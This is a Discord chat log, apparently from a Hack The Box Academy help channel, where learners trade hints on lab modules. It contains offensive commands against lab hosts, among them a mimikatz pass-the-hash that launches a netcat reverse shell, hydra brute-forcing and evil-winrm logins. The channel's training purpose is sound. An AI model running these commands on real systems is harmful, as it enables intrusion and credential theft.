#modules
Threader3000 is a really good quick scanner for ports
Gets the ones in higher places too
guys how to download kali linux
On the firewall ips/ids evasion medium lab, i think it wants me to use netcat to bypass it. But it’s not letting me use source port as a command in netcat. Ideas?
Ask Google
are you joking
k
Indeed I do like that, I take notes at the same time as I learn and I practice on an easy machine, but my fear is to have too much information and not knowing where to find the information, I think that over time I will delete some information and clean up my notes, but it's always terrifying to delve into this amount of information, practice will free me from this fear! thanks to you
HI, i am currently stuck at the question Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host,
AD Enumeration & Attacks - Skills Assessment Part II
can anyone help me out?
i have found the || mssqlsvc|| account name and password and administrator hash but have failed to log on to ms01 with pth (for the admin account) or just plain old evil-winrm using the ||mssqlsvc||
Which question number is that?
8
I used ||chisel|| with ||proxychains|| and ||evil-winrm||, and just passed the ||service account and its hash|| and it worked fine.
so you proxychained the sql01?
Been awhile, so I can't remember the specifics:
||proxychains evil-winrm -i 172.16.7.50 ....||
#wolfiej can you help me with something pls?
?
can you accept my friend request
No.
Because I don't know you. If you've got a question regarding modules, put the module, chapter, and question in here, and explain what you don't understand.
k
bruh
Someone didn’t read the rules
wdym?
@pine dagger yeah it didnt work, idk why i would need to proxychain it
I wasn't. I was chaining through the target host.
and it worked for me... sooo no idea why its not for you
@pine dagger can you tell me which rule did I break?
Rule 3
how did I break that?????
You’re asking to break into a gmail account. That’s not legal
then what do you do pls tell me?
bruh...
Hrmm?
Which user and hash are you using to login?
pls share a screenshot if possible and blur out sensitive things
can you tell me what do you do then
so is this not even a fucking hacker server?
It's been a while since I did this and I don't think you use a password to login as mssqlsvc
ok ill use the hash
You have everything you need
Probably delete hashes and passwords… even obscured ones 🙂
thanks
Hope you get it!
yep just got a shell its been approximately 5 hours im stuck on this
AD Enum is a tough module
Never saw a skid tell on themselves before... crazy
what is the time of the servers?
https://academy.hackthebox.com/module/80/section/779 - Broken Authentication - Predictable Reset Token
I think I made the script right but I think the problem is the time.
Have to brute force it iirc
can I dm u?
my script is fine I think
the only problem I think is the machines uses different times
or well maybe the problem is python which doesn't let me use md5 hashing without encoding first
Not sure why you're using an input for your time. Just use the time from the machine:
||from time import time; current_time = int(time()) * 1000||
Then you can change the start and end time by + and minusing from that. You can simplify your code as well:
||for i in range(start_time, end_time + 1): md5_token = md5((username + str(i)).encode()).hexdigest()||
because I am using this time
You dont need that time
from: 234952 to 234954
wdym
Quite stuck on this module and could use a hand:
https://academy.hackthebox.com/module/147/section/1356
I'm currently trying to ||mount a .vhd file|| and seem to be getting stuck on this line: ||Enter key or passphrase ("/dev/sda2"): which leads to (cryptsetup exited with status 2: No key available with this passphrase. (0))||
I'm not sure how to find this password, or if I'm misinterpreting things.
Feel free to DM me 🙏
I think thats the main issue you're having. With using linux epoch, you should be able to get the rest of it working. Just remember to provide a certain amount of msec from start to end.
Look at some of the John modules, i.e. zip2john. You should find it.
I found ||bitlocker2john|| but it doesn't seem to be working as expected. Thought maybe I was down the wrong rabbit hole. I'll double check my syntax though, thanks 🤔
Try the ||mutated list you made before||
You need to use John after you've got the hashes from that tool
As per usual, spent a mountain of time pulling my hair out over a missing flag (||bitlocker2john -i <file> instead of just bitlocker2john <file> killed me||) 😂 Thanks for reaffirming.
looool
TYPICAL.
Next steps are going to be learning how to unmount all of the partitions I accidentally mounted in this process 😂
am gonna try with this
Accessing content from Windows BitLocker encrypted partition in a vhd file on Linux
Thanks! I'll give it a read 🎉
Id have python also do the HTTP connection, etc. Possibly double your min/max range.
Can i please get some help?
I had done the script in 3 languages to try -.-
You're probably overthinking this one. The example shows you how to do it. ||But you need to use a different method. If you look at the source code, there's only two actions you can really do. Buy, or Redeem. Only one of them has a race condition though.|| I'd recommend I would do more sessions than they do 🙂
Metasploit should work. Make sure you specify the vhost.
HOLY #$*$ finally got the flag on the Attacking Common Services Hard module. A lot of research on correct exec commands and a lot of ChatGPT syntax corrections. Quite proud of myself right now. The part that kept confusing me ||was the way 'create a linked server' from one of the txt files is worded.|| I had to really think about that.
I'm trying to work with the one that hasn't been locked but just cant get anything to work... got there, was over thinking it!
Flag captured, disks unmounted, life is good. Thanks again for your help 👍
Yeah I was as well. Couldn't believe it was that simple when I got it.
@west night
Can I DM you???
hi i'm stuck in module password attack section attacking sam
Apply the concepts taught in this section to obtain the password to the ITbackdoor user account on the target. Submit the clear-text password as the answer.
- try xfreerdp with bob user, access denied
- try smbclient share ADMIN$ but reg.exe: command not found
You should be able to use RDP. Double check to make sure you're putting password in single quotes or escaping certain special characters
xfreerdp /u:bob /p:'P@ssw0rd!' /v:10.10.10.10
i'm sure use correct password, but bob user don't have access
Does the bob user have rights to save a file into the root of C:?
Also, did you "run as administrator" CMD?
FWIW that command works for me, so you may want to verify you ran the command prompt as an administrator.
just try use run as administrator and it work, cool
thanks @wispy aspen
anyone can help on ATTACKING COMMON APPLICATIONS - Other Notable Applications assessment?
I found the application which is vulnerable.
I got the exploit from exploit DB, and managed to test for Code Execution. But no matter what rev shell codes, i used. it still cannot work.
I know msf exploit can work, and tried it. Just wanna figure out why my rev shell payload is not working.
can i ask someone about type juggling in whitebox attacks
I have in my notes that I used ||48320.py|| Is that what you've been using?
nope, i am using ||48971||, i'll try using ||48320.py|| thanks!
What is the actual name of the section and module?
Authentication Bypass - Type Juggling in Whitebox Attacks module
Is that in the CBBH exam?
No, the Whitebox Attacks Module
https://academy.hackthebox.com/module/details/205
Maybe @wild dragon or @pine dagger can help you
@hidden trellis I sent you the guide for it
I am really stuck at this question. Please help me!
Tried everything from forums, etc. Not able to get the password for the 'sam' user and hence the flag. 😭
Module
Password attack: Password mutation
I tried ftp: access denied
smb shares: found nothing
and ssh: ......................... 
how ? all ftp login says wrong password
@short hare
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
sed '1,17000d' mut_password.list > mut_password1.list
following this!
using it to crack sam's password!
mut_password1.list
ok let me give it a try
How long it will take?
m using ..
hydra -t 4 -L user.txt -P mut_password1.list ssh://<ip>
and in user.txt gave 'sam' only as the user
you should crack FTP!
2 commands above --> creating muta password list!
using the muta password list to crack FTP with user is sam
Thanks got the flag
I'm not really familiar with mounting vhd files in linux I was following this page and somehow I'm getting this error
https://itsfoss.com/mount-encrypted-windows-partition-linux/
sudo dislocker /dev/loop0p2 -upassord -- /media/bitlocker
Sun Aug 13 09:11:47 2023 [CRITICAL] None of the provided decryption mean is decrypting the keys. Abort.
Sun Aug 13 09:11:47 2023 [CRITICAL] Unable to grab VMK or FVEK. Abort.
Feels like crying...!
Hey how the 2nd command sprouted on your mind? Just wondering
hi im doing my first linux module and im stuck on "Use the "systemctl" command to list all units of services and submit the unit name with the description "Load AppArmor profiles managed internally by snapd" as the answer." and cant find the answer anywhere help!!
@compact jacinth you should tell everyone what is your section & module!
hello @short hare seems as we are working on the same module can i PM you for some inquiries ?
yea
hello @slender shoal can i also PM you for some inquiries ?
Got it....
I wonder how htb expects this much depth! 😆
ok!
deleting the first 17000 lines is not an expectation from HTB, but a recommendation here in Discord
Will take a note in attempting future questions
this command from the "Service and Process Management" Section is helpful for you!
remember that you should filter the snapd service with
<command_from_the_section> | grep snapd
Hi there, I'm trying to solve the Password Attacks Lab - Hard :
Found a smb share /david/Backup.vhd and I'm trying to mount it for too long now, I haven't done this before any help on below error?
I'm not sure what's the key for /dev/sda2?
guestmount --add /mnt/david/Backup.vhd --inspector --ro /mnt/vhd
Enter key or passphrase ("/dev/sda2"):
guestmount: could not find key to open LUKS encrypted /dev/sda2.
Try using --key on the command line.
Original error: cryptsetup_open: cryptsetup exited with status 2: No key available with this passphrase. (0)
I was trying this and got an error, I don't recall it now as my lap time was up, I will redo these steps again
Accessing content from Windows BitLocker encrypted partition in a vhd file on Linux
Yes yes I have seen all these medium pages from other guys asking the same question I'm trying it all over again
We have no clue what you have and haven't seen /shrug
what does this mean?
Sun Aug 13 10:54:11 2023 [CRITICAL] None of the provided decryption mean is decrypting the keys. Abort.
Sun Aug 13 10:54:11 2023 [CRITICAL] Unable to grab VMK or FVEK. Abort.
None of the **provided decryption** mean is **decrypting** the keys.
here I was trying
the key im typing is incorrect?
I'm using the same password for david, as I'm assuming it should open me this vhd file as it's shared on his name, right?
I would suspect that the tool you are using (guestmount) doesnt support mounting bitlocker encrypted drives
And no david's password doesn't work
Because that would be too easy for a Hard Skill Assessment 🙂
wow, because I saw some people after successfully mounting the file there are more steps with sam files etc, okay!
But any hint where else to search for this password then? I have two more passwords from the file "login.kdbx" i found on johanna machine.
I thought of something like vhd2john but no script
Try re-reading the module https://academy.hackthebox.com/module/147/section/1323
wow It's exactly there thanks, lemme dig more then thank you!
Almost like they are testing you with the skill assessment on things you were taught...
Yeah only if I could recall this :(((( I was struggling with the mounting and reached several times to this key pass thing, found out, I'm using wrong key. I hope I will manage to crack in.
That's why I put my content into OneNote. Made it all searchable 🙂
download obsidian
When in Windows **Privilege Escalation > Print Operators** I can't figure out what to do when it says compile with Visual Studio 2019 (cl.exe). It isnt recognized and the user path doesnt exist...
Any Ideas? 🙏
what error are you getting
Yeah definitely, I finished the module thankfully, I will also make notes for this module what platform do you recommend. I know medium and Notion, open for your suggestions
Obsidian I think is the defacto. OneNote, is also decent.
Check C:\Tools
I think, all what you need is there
One question if we need to write http 127.0.0.1 9050 in the proxychains.conf in order to make rpivot work, why we call it SOCKS when in reality is HTTP???
Not sure what you mean. It's a socks proxy.
Sorry If we are not using socks type connection, why we still call it socks? I mean we have to configure proxychain with http, not with SOCKS, still we call it socks proxy?
Sorry I am new on this, this thing just makes me feel confused
You should be doing it as socks
it doesn't work for me
tried with socks4 127.0.0.1 9050 and socks5 127.0.0.1 9050 and then proxychains firefox-esr IP:80
Just giving me page not found
I modified with http 127.0.0.1 9050 and worked perfectly
But I think that it is still using SOCKS protocol even in the configuration we put http that is the reason I suppose that htb still name it SOCKS proxy ...
Even though the module suggests using proxychains like that, you really shouldn't do it that way, and it probably is what is giving you issues
use something like foxyproxy
oki I tried to add
Instead of piping literally everything through proxychains, it's an extension that will allow you to quickly just turn socks proxies on/off.
I mean I tried to add one proxy to foxyproxy
COuld I dm you?
ok done easier with foxyproxy
but still I dont understand why if socks5 support http it doesnt work
thx restie probably this is going to solve my doubt about the exercise... i..ot
Obsidian
Not necessarily. Some machines block pings.
Hi everyone, need some help in the shells & payloads module live engagement
Tried multiple things but everytime not able to get a shell
Guys is the bug bounty hunter module a guaranteed way to like master it if i study it a lot
There a question in Linux fundamentals
Which kernel version is installed on the system?(Format:1.22.3)
I tried uname -v
But the answer does not match
Idk why I'm not allowed to send photos here
The + is disabled
I'll try from pc
I think so
read #welcome and #rules after that use /verify at #bot-commands to send a screenshot here
Is that for Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt
guys how to download kali linux
Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments.
ATTACKING COMMON SERVICES - Attacking SMB
Login as the user "jason" via SSH and find the flag.txt file. Submit the contents as your answer.
I got the password; whenever i want to SSH it gives me: jason@10.129.72.27: Permission denied (publickey).
Tried some things but didn't get me where i needed to be. Any nudge, anyone?
I'm stuck on AD Skill Assessment part II. I only need 2 more flags. Could use a hint or two if anyone here has finished the AD module
try using that password to access other services and think how to access via ssh without password
Hello, I have a problem with Suricata Rule Development Part 1 question, the question is In the /home/htb-student directory of this section's target, there is a file called local.rules. Within this file, there is a rule with sid 2024217, which is associated with the MS17-010 exploit. Additionally, there is a PCAP file named eternalblue.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to MS17-010. What is the minimum offset value that can be set to trigger an alert? I don't understand how to find the minimum offset value. I would be glad if some1 could explain this to me.
Play around with the value of "offset:X" such that when u run the command suricata -r /path/to/pcap an alert is triggered
Yea, i got it, thk
Attacking Common Services - Easy, Ive found the username ||fiona@inlanefreight.htb|| but it wont get bruteforced
Capital F
With or without inlanefreight?
Without
ah ok
one sec. I'll do the machine again and help you
My apologies. If you're bruteforcing SMTP you will need the domain. And also, I checked my notes and I was mistaken about the capital F.
rockyou
Ah thx
also, i used this command that's in cheatsheet hydra -L users.txt -p 'Company01!' -f 10.10.110.20 smtp
ncrack with users and 200 most used worked for me per my notes.
he wants the password
I got the password for the user
another hint for later, 0 = cmd
Question ||IMAP and POP3 isnt running on the host, so how am i supposed to access the mail xd||
did you know that microsoft have their own sql server?
and you can access webpages using ip's
man, look at ports
I know
but, sometimes the sections cover something and the skill assessments cover something completely different
read the sql section about microsoft and go to its webpage
aaaaaaaaa
don't worry. the medium machine will be simple
In Footprinting/imap & pop3...
I've found the flag in imap, but when submitting it as an answer it gets rejected. There aren't any other flags requested in this module, so I'm not sure what I'm doing wrong
Oh, I missed a question. There are two flags for imap
Are you sure there's one for pop3? Both questions say imap. Maybe that's an error?
Yeah, but the questions both say imap though
it must be a mistake
Hello, need help on Academy module - Footprinting Lab - Medium, I have an error when I try to connect to SQL server
@fathom stump if you want the credentials for imap, read the section again
I've found the flag in the imap emails
It's the one that says "enumerate imap and submit the flag" that I can't find
pop3 has no emails on it for the given user
@dusky rivet use your machine
You're telling me I can't connect to the DB with remmina? bruuh
@dusky rivet did you know that you can open a database as administrator?
and use that to authenticate
rdp and you can find the password in the machine
Not sure to understand, context: I used the pwnbox to log in through rdp with the user Alex. Now I have to get the password in the DB in MSSQL, I found creds to get it. But I can't use them with the GUI
you can
huh
right click and open as
and I don't know the administrator's password, I've already completely pwned (via metasploit) the machine so I can change the admin password but it was unexpected
aaah, run as alex, or the famous second account?
The password you found works for admin
yup, but french keyboard didn't work for the special carac "@" I used a virtual keyboard, all is fine now thanks!
Just copy and paste
Got both flags, they are both in imap @rustic sage
Just need to find the admin email now
not working, I tried it. Prob cause of remmina
go to the forum, they'll give you the command
guys how to download kali linux
You were told to Google yesterday, kali has plenty of documentation and downloads based on what you need/want it for
Youtube has many guides for that
Multiple people have already answered you, two of which sent you the link...
ippsec
`rogram 'inveighg.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1
- .\inveigh.exe
-
At line:1 char:1
- .\inveigh.exe
-
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException + FullyQualifiedErrorId : NativeCommandFailed`
can someone help me please?
inveighg.exe' this is your error
im at skill assessment 2 of the ad module question 9
thats the file name
`Program 'inveigh.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1
- .\inveigh.exe
-
At line:1 char:1
- .\inveigh.exe
-
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException + FullyQualifiedErrorId : NativeCommandFailed
`
ive seen its a problem with x64 or x86
but ive tried both versions and it still doesnt work
mimikatz the same problem
Are you transferring these to the machine, or using the one on the box?
transferring
I'd check the file hash, to make sure that they aren't getting corrupted in transit. If so, try a different method.
If it's not in C:\Tools\, you will have to transfer it
is invoke webrequest a good file transfer method?
its what ive been using
even powerview was giving me errors
Are you using UDP for VPN? Might give you some issues.
Yeah, definitely corrupting in transit, then. I'd try TCP VPN first, and if that doesn't work, some other transfer method.
which ones are the most reliable?
python3 -m http.server and invoke web request dont seem to be that great haha
ill try doing smb server or something like that
The python method has always worked fine for me.
Attacking Common Services - Easy, ive got the credentials and ive tried to connect to the IP using telnet, i successfully authenticated, but how am I supposed to retrieve the mails? Ive been stuck on this for a while now
None of these work
yep ive done a smbserver.py from my own computer to the attack host then just a simple http.server to Invoke-WebRequest and it worked
idk why the other way didnt
is Inveigh just a beefed up responder?
I was curious, so I googled. Top result:
"Regardless of how Inveigh is described though, if you have used Responder, Inveigh's functionality will be easy to understand. The main difference being that where Responder is the go to tool for performing LLMNR/NBNS spoofing attacks, Inveigh is more for PowerShell based Windows post-exploitation use cases."
Take that how you will.
If you're logged in with the user account you found, you should be able to ||create a file on the server, and then use that as a webshell||.
can someone help me understand winrm?
so ive been trying out win rm to dc01 with the credentials for the last user in the skill assessment, because logically, if i got the hash from that ip i should be able to connect to it right? so ive done that with smb but when i try to do anything else than with smb, nothing works. win rm, smbexec, psexec, rdp, whatever.
im redoing a full port scan on it to see if theres like a hidden port or something
You're referring to AD Enum right? Which chapter/question?
skill assessment 2 Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.
try revshells
Ah Right. WinRM with username and password worked fine for me with evil-winrm to DC01 through my proxychain
pass it the param?
?cmd=id
as an example
Nothing, but I think I know why, its because I changed the shells thing from " to ' so i can have it in ""
but I cant upload the shell if I dont change them lol
|| evil-winrm -u CT059 -p c***** -i 172.16.7.3 ||am i just super dumb?
Works for me
bruh
As said, I did it via proxychain though
but proxychained from your personal pc to the attack host right
yarrrr
ah
might be the initial target doesnt have a good version of evil-winrm
Still doesn't work
You need single quotes around cmd, and double quotes around the php code, and I used single quotes on the OUTFILE.
i swear to god i hate win-rm `sudo proxychains evil-winrm -i 172.16.7.3 -u CT059 -p *****
ProxyChains-3.1 (http://proxychains.sf.net)
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1`
Doing Whitebox Pentesting 101: Command Injection: Skills Assessment and i believe I have found the vulnerability and to confirm it I used tcpdump to ping myself
@pine dagger can you dm your command?
Hello guys , any tips for new people on htb
Sent over.
There's ||a certain file that you can access on the target machine. You can overwrite that file with whatever you want. i.e. output ls, or file contents.||
👍
Do you mean on HTB in general? Or on Academy?
this is from Blind verification section We can redirect the output of the command we executed with ">" to /var/www/html/output.txt, and then attempt visiting this page on the server. Though this may be a good way to eventually retrieve output, it may not be very good to verify command execution, as there are many ways this could fail without us knowing.
the question is what to write to a file, if i don't know what it is, and How to search for it ???
If you've worked out how to perform the command injection, and can send commands, you're pretty much done. The file in question is a key file you use to get started... 🙂
I have never tried it before, will give it a try, thanks a lot
sorry if I am being rude, but can you please rephrase it again ?
Which part? If it’s the file… let me ask this… where did you get the code? 😉
Htb general
well that depends on ur background
i think i have a mistake, the ping request worked because i was running a local server and any cURL to this local server will eventually lead to a ping request
Can someone hack my exes discord
i have tried "package-lock.json" and "style.css" but that didn't work, perhaps one of them is the right file but i did something wrong with my command
🙏
ok I think i got, i will try
wrong place
You may want to read the rules. I.e. rule 3. Asking people to do that is most definitely not legal.
I'm doing the Splunk module (https://academy.hackthebox.com/module/218/section/2356), and I'm maybe misunderstanding the phrasing of this (or the actual meaning behind the eventid):
find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes
4624 is successful logins - 4625 is failed. I read an attempt, as a failure - am I misunderstanding it, or ?
Im having the same issue, no problem reaching other boxes but Timelapse doesn't show any open port, anyone else?
I understand the question to ask you to count the number of logins within 10 minutes.
Which user has the most logins within such a 10 minute slot?
See, I guess that's the second part, it says account and not user - so I would expect the result (if my query is correct) to be a computer account
hello
Hello everyone.
How can i use the bon key provided in interactive section in order to interact with the target on my own machine??
Someone to help me please
i'm broke, any free training academies for cybersecurity?
Did you solve this? :)
Yup, gotta go look at my notes for a hint—not at computer rn
Oh, you mind me sharing what I'm doing (Which is wrong) for some feedback - whenever time suits you ?
Ya sure
can anyone direct me to any course on htb that helps with rpc? I keep landing on boxes that has some of these open, and I never know how to approach them.
Hi , i'm doing the WINDOWS EVENT LOGS & FINDING EVIL module (https://academy.hackthebox.com/module/216/section/2303) , and i cant seem to understand the question : By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe . Can anybody give me a hint ?
have you done that??
Submit the contents of the flag.txt file on the Administrator desktop on MS01
https://academy.hackthebox.com/module/80/section/782 Broken Authentication - Brute Forcing Cookies - 2nd question
someone could give me a hint please
Is there a general channel
yes, once you verify your Discord account with a token from your user profile
does anybody know why kerbrute tool (AD Enum&Attacks module) doesn't save output to the file when specified? Tried -o/--output and it only creates the empty file. Same with existing file - writing to it doesn't do anything
It worked yesterday, though
Module: Attacking Common Services
Attacking SQL Databases
Hello, I have issues for the first question : What is the password for the "mssqlsvc" user?
When I launch
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
I got the return name and under it nothing.
I saw that the user sa exist but when I try to use it, it say that it doesnt exist or that i dont have permission
I am working with mssqlclient.py
thx
yes
Did you solve this task with range()?
If so, would you show me your solution? Gladly by DM.
I have answered the question, but not with the way the author intended.
I can't get it to work with range().
I believe i used time bin … ill be back at the computer later and can dm
No problem, I am no longer at the PC today.
Tomorrow I will take care of this task again.
I want to find a way to narrow down the results more.
What if I don't have a HTB account
You use proxychains??
Or other method like create new user to login with rdp
Nah I just used the hash that I got (NTLM) and winrm
Thanks
Then you can create one. 🤷♂️
Payload Bunny. You got some nerve ordering me around
I am not commanding you at all.
I am showing you a solution.
U come in here with ur fluffy ears and claim to have a "solution" to everything that goes on
Did u consider that I'm NOT SURE if I want to create an account
Without verifying your account, you will not have access to many channels.
Thats strike 2
strike 2 like managing a child lmaooo
why after doing pass the hash with mimikatz command specified in /run is still getting run as my current user, not the one i have passed hash? sekurlsa::pth /user:julio /rc4:811c7040a32423b74b14043a9f76cd0 /domain:. /run:"C:\tools\nc.exe 10.129.1.6 9876 -e cmd.exe"?
Do u have an account
yes
how do you get academy role
Traitor
then you can't join the rest of the discord
it's a rule we had to enforce due to spammers and kids who were up past their bedtime
If you have the Silver Year subscription, you get this role
ah ok
I just have one question
Does HTB have boxes or material for reverse engineering
Some I believe
Is HTB going to drop a SOC Analyst Cert?
I mean... they've got the job role lined up... my guess is yes, but it's just a guess
Ya ok—i saw that and was like wait a sec
Your guess was leaked a couple of days ago
time to re-new
any help pls 😢
Try ||responder||
I am waiting for HTB to announce the entire path.
I still have a lot to learn....
So I know what all is coming up.
yoooo
I use ||responder||, but since i have no "sa" that appears i m stuck
@acoustic owl I've decided to create an account
Wtf someone used my email ..... ????
You do not need sa
This is a weird interaction but if it's tied to your email, and you have access to your email, then recover the account?
Yes I just recovered it
Only the support can help you with this. (Green Bubble)
How do I connect it to discord
Need to speak to a person? Learn how to reach our support via the Main Platform.
Footprinting/SNMP
I'm guessing there's a specific word list to use with onesixtyone that isn't in the seclists/snmp folder? No hits with anything there.
hello all i really need your guys help
module: Skills Assessment - Using Web Proxies
question 3
all the results are showing 404
So I've been at this for quite some time and I'm pretty stumped. A seemingly straightforward problem: “What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.” But I’m stuck and the hint is garbage. “Get-WinEvent can show us the specific records and how many there are right?”
Located in INTRODUCTION TO WINDOWS COMMAND LINE Skills assessment, last question. For those who want to login you'll need this: user10 & vmtoolsd.exe (password)
Normally I would figure this out myself but I’ve been at this for 4 hours and the closest I can get is using:
Get-WinEvent -FilterHashtable @{ProviderName = 'Microsoft-Windows-Security-Auditing'; LogName = 'Security'; Id = 4625} | Select-Object -ExpandProperty Message
In desperation I also tried dumping the list of ActiveDirectory users with:
Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName
And trying each as an answer which still hasn’t gotten me the answer.
Please help!!
rt command should be what you're looking for
I'm doing the Pivoting module, RDP and Socks Tunnelling with SocksOverRDP. I have started the SocksOverRDP dll and Ran the server thing on the first host, setup Proxifier and added the Proxy server. When I try to connect from the initial foothold to the target with RDP I get the following error. Anything else I can do from my end to fix this?
What Is DC IP?
Probably shorthand for saying the domain controller’s IP address
Thanks
i am going to dm you my solution
https://academy.hackthebox.com/module/80/section/848 Broken Authentication - skills assessment
I need a nudge please
A bit stuck on the last question under Attacking common services - Attacking SQL Databases. I've got the mssqlsvc and logged in via mssqlclient.py, but I'm not sure what commands to run. I'm at a loss when it comes to SQL syntaxes etc.
Check the cheat sheet. From my notes, if you are in sql with un/pw, you should just need those commands.
xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer
Is the comma in here an error? The command is not working. I changed the IP, the username, and the password for the exercises. I also changed the file path to home/kali/test.txt
[ERROR][com.winpr.commandline] - Failed at index 4 [/drive:linux,home/kali/tester.txt]: PostFilter rule could not be applied
that's the error I got
Okay, nevermind, it's working now
You have to have an RDP session already running before you log in for the tsclient
I am working through the DNS Enumeration Using Python module.
I added the IP for inlanefreight.htb to my hosts file. My question is, I can dig a record for inlanefreight.com. When I use dig against inlanefreight.htb, I have to input @<IP> following.
Why do I have to @ the target IP if I added the domain name and IP to my hosts file?
Hi, All Session Security Skills Assessment, Can someone help
Hi there, working on "Intro to AD Enumeration" module, page "skills assessment 2". Stuck on Q8 - Getting Admin access to MS01, if anyone can msg me or provide any hints I'd be eternally grateful. Thanks
DM
sure what's the issue?
sure shoot me a dm if you still need help
htb is not an official TLD. So the root servers cannot resolve it. You must therefore specify the name server that knows this zone.
You can either use an IP for this, or a domain. But the domain must be resolved to an IP before resolving your dig request. So it doesn't really make sense to specify a domain as name server.
tr 'A-Za-z' 'N-ZA-Mn-za-m' < encrypted_file.txt > decrypted_file.txt
Or just use cyberchef
Are you using the provided wordlists?
Can I please have some guidance on Keeper?
Question on "Attacking Common Services - Medium",|| ive enumerated the target and I cant get a foothold, ive tried enumerating the DNS server, found nothing. Tried to connect to the FTP services and I wasn't able to, should I start bruteforcing the services now? I see no other way||
I get connection refused when I try connecting to FTP
bruh hint enum ||highest ports||
perhaps run with more nmap flags and see what you get?
You have an unknown service
What exactly is it? Try to find out what it is
what about the other one
Try it without username. Not every server accepts a username this way
Doesnt work
-P? Did you read the man page?
look at your nmap scan, it's staring you in the face
||aaa maybe using it as a proxy lmao for 30021||
try without the -P
if you have an unknown service how can you tell nmap to find more info about what is running?
Wdym that shouldnt make a difference
Ftp is the user interface to the Internet standard File Transfer Protocol. The program allows a user to transfer files to and from a remote network site.
I just sent a screenshot of that scan, ive already got the information on it
a
I can't see that option in the man page
-p- does all ports
with nmap yes, but not with ftp
oh FTP, yeah -P can be used to specify the port number
No
Read the man page
https://linux.die.net/man/1/ftp
ah my bad, its early in the morn
It says -P specifies the port in the man page
||And I tried using a proxy but it didnt work xd||
so if you are still trying this idea out then hint it's the wrong path
I am very lost, I have no clue what to do except brute forcing (But I know it should be the last thing one does so I wont do it just yet)
i'll help you in dm in a sec
For this reason I have linked you to the man page.
-P is wrong.
try it like this
ftp <ip> <port>
or this will help better 👆
I guess the box is just broken
if you saw the tmp screenshot i sent then you should get what the right path for this assessment is, and try the usual troubleshooting: restart the box, try the pwnbox, change the vpn
of course the box that you have is on the old vpn, restart the box to get a new one that is in our new vpn network
hey guys, I'm stuck at the "Attacking Common Services" : "Attacking SQL Databases" at the Q : " What is the password for the "mssqlsvc" user? "
does some1 have a hint 4 me?
||Responder|| is your friend
I'm trying to solve the Heartbleed task in HTTPS/TLS ATTACKS, but I can't get the private key with the command given in the module text. I know it's not deterministic, but I ran it at least 20 times in a row now. Is that normal? Should I continue trying or is something wrong?
nevermind - dont know if it was coincidence, but after restarting the machine i had it on the 2nd try.
do I need 2 access as "mssqlsvc" (the user I found his password)?! cause I can't...
For this Question?
What is the password for the "mssqlsvc" user? - No
For this Question?
Enumerate the "flagDB" database and submit a flag as your answer. - Yes
oohhh I think I got it, thanx
For the pivoting skills assessment, the pivot host has internal ip 172.16.5.15/16. Does this mean I have to scan the whole range 172.16.0.0/16 with nmap or 172.16.5.0-245, to discover hosts that are accessible through the pivot host?
It's been a few months since I did that module, but I can't imagine any scenario where you'd need to scan a /16
I thought that but was then wondering why it is on /16
Are you sure it is? Regardless, just scan the /24
thanx widows have a way sometimes 😉
Thanks, u pretty sure ip a lists it and broadcast is 172.16.255.255
Jeez my target spawning is taking ages
am I the only one? Or is the deployment system down?
Hi I am new, I have a question if anyone can answer it.
In the “ACTIVE DIRECTORY ENUMERATION & ATTACKS” module under the “Internal Password Spraying - from Windows” section, I cannot use the “DomainPasswordSpray.ps1”. To elaborate, it won’t generate the UserList even though in the section it said the script automatically created one. I tried using a different namelist like jsmith.txt and john.txt but they all just freeze at
[*] Setting a minute wait in between sprays.
Any advice?
Because the system is domain-joined, you don't need the -UserList flag. The tool can make the queries for the users from the domain
Hi, can anyone help me with the final Skill Assessment for the HTTPS/TLS Module? I can't decode the cookie value, i guess my payload is wrong? any help appreciated
can anyone direct me to any course on htb that helps with rpc? I keep landing on boxes that have some of these open, and I never know how to approach them.
enumerating common services and attacking common services both cover these
this one?
not explicitly finding those
yup, just found it, thanks!
And attacking common services - attacking smb too
You’re welcome
hi i'm stuck in Pass the Ticket (PtT) from Linux
question:
Check svc_workstation's sudo privileges and get access as root. Submit the flag in /root/flag.txt directory as the response
what im doing:
- try ssh david got password carlos
